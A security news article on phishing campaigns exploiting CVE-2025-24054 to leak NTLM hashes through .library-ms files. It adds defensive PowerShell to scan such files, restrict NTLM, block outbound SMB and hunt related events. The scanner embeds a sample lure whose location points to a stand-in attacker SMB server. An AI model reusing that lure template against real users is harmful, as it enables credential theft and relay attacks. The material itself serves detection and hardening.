Exploitation of Windows Vulnerability Puts NTLM Hashes at Risk

April 30, 2025


A recently patched Windows vulnerability, CVE-2025-24054, is being actively exploited in phishing attacks against government and private organizations to steal NTLM authentication hashes.

Bill Toulas reports in BleepingComputer that the flaw, initially deemed unlikely to be exploited, was addressed in Microsoft's March 2025 Patch Tuesday updates.

However, within days of the patch, researchers at the cybersecurity firm Check Point identified active exploitation campaigns using the vulnerability to extract NTLM authentication hashes with minimal user interaction.

The attack vector involves phishing emails distributing malicious .library-ms files (Windows Explorer library definitions), either directly or inside ZIP archives, that point to attacker-controlled SMB servers.

When Windows Explorer processes one of these .library-ms files, even without the user opening it (a single click or a right-click is enough), the operating system attempts an SMB connection to the remote server and authenticates with the NTLM protocol. The NTLMv2 challenge-response hash sent in that handshake is captured by the attacker's server and can be cracked offline or relayed to other services, giving the attacker a foothold as that user.
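The following PowerShell scanner is an added example, not code from the article or from Check Point. It pulls every location out of a .library-ms file and flags any that point off-host, which is the property a mail gateway or endpoint check would key on. The element names and namespace come from Microsoft's Library Description schema; the sample file is constructed for the example, with the RFC 5737 documentation address 203.0.113.10 standing in for an attacker's server, and the internal-host allowlist is an assumed placeholder.

```powershell
# Added example: scan a .library-ms file for locations that would make Explorer
# authenticate to a remote host. Not part of the original article.

function Get-LibraryMsLocations {
    <#
      Returns every <simpleLocation><url> in a .library-ms file, classified by scheme.
      Explorer resolves these URLs while rendering the library, so a UNC path to a
      remote host triggers an SMB/NTLM handshake without the file being "opened".
    #>
    param(
        [Parameter(Mandatory)][string]$Path,
        # Assumed placeholder: hosts your own libraries legitimately reference.
        [string[]]$AllowedHosts = @('fileserver.corp.example')
    )

    [xml]$doc = Get-Content -LiteralPath $Path -Raw
    $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $ns.AddNamespace('lib', 'http://schemas.microsoft.com/windows/2009/library')

    foreach ($node in $doc.SelectNodes('//lib:simpleLocation/lib:url', $ns)) {
        $url = $node.InnerText.Trim()
        $kind = 'Other'; $targetHost = $null
        switch -Regex ($url) {
            '^\\\\([^\\]+)'      { $kind = 'UNC';         $targetHost = $Matches[1]; break }
            '^https?://([^/]+)'  { $kind = 'HTTP';        $targetHost = $Matches[1]; break }
            '^knownfolder:'      { $kind = 'KnownFolder'; break }
        }
        [pscustomobject]@{
            Url    = $url
            Kind   = $kind
            Host   = $targetHost
            # Remote network location that is not one of ours: this is the NTLM trigger.
            Remote = ($kind -in 'UNC','HTTP') -and ($targetHost -notin $AllowedHosts)
        }
    }
}

function Test-LibraryMsSuspicious {
    # True if any location in the file would send credentials to a host we do not own.
    param([Parameter(Mandatory)][string]$Path)
    [bool](Get-LibraryMsLocations -Path $Path | Where-Object Remote)
}

# Constructed sample: the layout of a stock Windows library with the location
# swapped for a remote UNC path, as the phishing attachments do. Not a real IOC.
$sample = @'
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\203.0.113.10\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
'@

$tmp = Join-Path $env:TEMP 'sample.library-ms'
Set-Content -LiteralPath $tmp -Value $sample -Encoding UTF8
Get-LibraryMsLocations -Path $tmp | Format-Table -AutoSize
"Suspicious: $(Test-LibraryMsSuspicious -Path $tmp)"
Remove-Item -LiteralPath $tmp
```

Scanning is done on the file's text only; nothing here resolves the URL, so the script itself never triggers the authentication it is looking for. A benign library points at `knownfolder:` GUIDs or local paths, which is why anything classified UNC or HTTP to an unknown host is worth quarantining.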

Although attribution is inconclusive, one IP address used in the campaign has past associations with the Russian state-backed group APT28.

Check Point’s analysis revealed that these phishing campaigns intensified from March 20 to 25, initially targeting entities in Poland and Romania, and later expanding globally.

In some campaigns the .library-ms file was bundled with additional file types that abuse older, already-patched NTLM hash-disclosure flaws, giving the attackers a fallback if one trigger failed and making the campaign more reliable.

Microsoft confirmed that the exploit requires only minimal interaction to be triggered, such as right-clicking the malicious file rather than opening it, which raises the practical threat level despite the flaw's "medium" severity rating.

Firms handling sensitive client data should treat this threat as high-risk. Immediate steps should include applying Microsoft's March 2025 updates, auditing systems for remaining NTLM usage (Windows can log every outbound NTLM authentication before anything is blocked), restricting or disabling NTLM where feasible, and blocking outbound SMB (TCP port 445) from workstations to the internet so that a leaked lookup cannot reach an attacker's server.

Security teams should monitor for .library-ms files arriving by email or being created on endpoints, and educate staff on how to identify suspicious attachments. Given the low barrier to exploitation, proactive defense is critical for limiting credential theft, NTLM relay, and the lateral movement and privilege escalation that follow.
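The following PowerShell is an added example of the audit, hardening and monitoring steps above on a single Windows host; it is not code from the article or from Microsoft. The registry values, log names and event IDs are Microsoft's (the "Restrict NTLM" and "LAN Manager authentication level" policies, the Microsoft-Windows-NTLM/Operational log, and Sysmon event 11). The function names, the firewall rule name, the `corp.example` domain suffix, and the presence of Sysmon are assumptions for the example. Run it in an elevated session on a lab host first, then roll the settings out by Group Policy.

```powershell
# Added example: audit NTLM posture, restrict outbound NTLM, and hunt for the
# two signals this campaign leaves behind. Not part of the original article.
# Requires an elevated PowerShell session for the Set-* steps.

$LsaKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$Msv1Key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$RuleName = 'Block outbound SMB to Internet'   # assumed rule name

function Get-NtlmPosture {
    # Reads the values behind "LAN Manager authentication level" and
    # "Restrict NTLM: Outgoing NTLM traffic to remote servers". Absent = OS default.
    $lm   = (Get-ItemProperty -Path $LsaKey  -Name LmCompatibilityLevel       -ErrorAction SilentlyContinue).LmCompatibilityLevel
    $send = (Get-ItemProperty -Path $Msv1Key -Name RestrictSendingNTLMTraffic -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
    $sendMeaning = @{ 0 = 'allow all'; 1 = 'audit all'; 2 = 'deny all' }
    [pscustomobject]@{
        LmCompatibilityLevel       = if ($null -eq $lm)   { 'default (not set)' } else { $lm }
        RestrictSendingNTLMTraffic = if ($null -eq $send) { 'default (allow all)' } else { $sendMeaning[[int]$send] }
        OutboundSmbToInternetBlocked = [bool](Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)
    }
}

function Set-NtlmOutboundRestriction {
    # 'Audit' (1) logs each outbound NTLM authentication as event 8001 without
    # blocking it; run in that mode first to find legitimate dependencies, then
    # move to 'Deny' (2). LmCompatibilityLevel 5 refuses LM and NTLMv1 outright.
    param([Parameter(Mandatory)][ValidateSet('Audit','Deny')][string]$Mode)
    $value = if ($Mode -eq 'Audit') { 1 } else { 2 }
    New-ItemProperty -Path $Msv1Key -Name RestrictSendingNTLMTraffic -Value $value -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path $LsaKey  -Name LmCompatibilityLevel       -Value 5      -PropertyType DWord -Force | Out-Null
}

function Set-OutboundSmbBlock {
    # Stops the SMB connection to an attacker's server regardless of NTLM policy.
    # Caveat: if SMB fails, Windows can fall back to WebDAV over HTTP through the
    # WebClient service, which also authenticates with NTLM; disable that service
    # on workstations that do not need it.
    if (-not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $RuleName -Direction Outbound -Protocol TCP `
            -RemotePort 445 -RemoteAddress Internet -Action Block -Profile Any | Out-Null
    }
}

function Find-OutboundNtlm {
    # Event 8001 is written once RestrictSendingNTLMTraffic is 1 or 2. The rendered
    # message names the target server; anything outside our domain is a candidate leak.
    param([datetime]$Since = (Get-Date).AddDays(-7), [string]$InternalSuffix = '.corp.example')
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $target = if ($_.Message -match 'Target server:\s*(\S+)') { $Matches[1] } else { $null }
            [pscustomobject]@{ Time = $_.TimeCreated; Target = $target; Message = $_.Message }
        } | Where-Object { $_.Target -notlike "*$InternalSuffix" }
}

function Find-LibraryMsDrops {
    # Sysmon event 11 (FileCreate), assumed to be deployed: a .library-ms written by a
    # mail client or archive tool is exactly what the phishing lure produces.
    param([datetime]$Since = (Get-Date).AddDays(-7))
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 11; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($d.TargetFilename -like '*.library-ms') {
                [pscustomobject]@{ Time = $_.TimeCreated; File = $d.TargetFilename; Process = $d.Image; User = $d.User }
            }
        }
}

# Typical sequence: observe, then restrict, then keep hunting.
Get-NtlmPosture
Set-NtlmOutboundRestriction -Mode Audit
Set-OutboundSmbBlock
Find-OutboundNtlm   | Format-Table Time, Target -AutoSize
Find-LibraryMsDrops | Format-Table -AutoSize
```

Moving from `Audit` to `Deny` is the step that actually prevents the hash from leaving the machine, and it is also the step that breaks anything still relying on NTLM, which is why the 8001 events are collected for a week or two before flipping it. The firewall rule covers unpatched hosts in the meantime, subject to the WebDAV caveat in the comments.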

Critical intelligence for general counsel

Stay on top of the latest news, solutions and best practices by reading Daily Updates from Today's General Counsel.
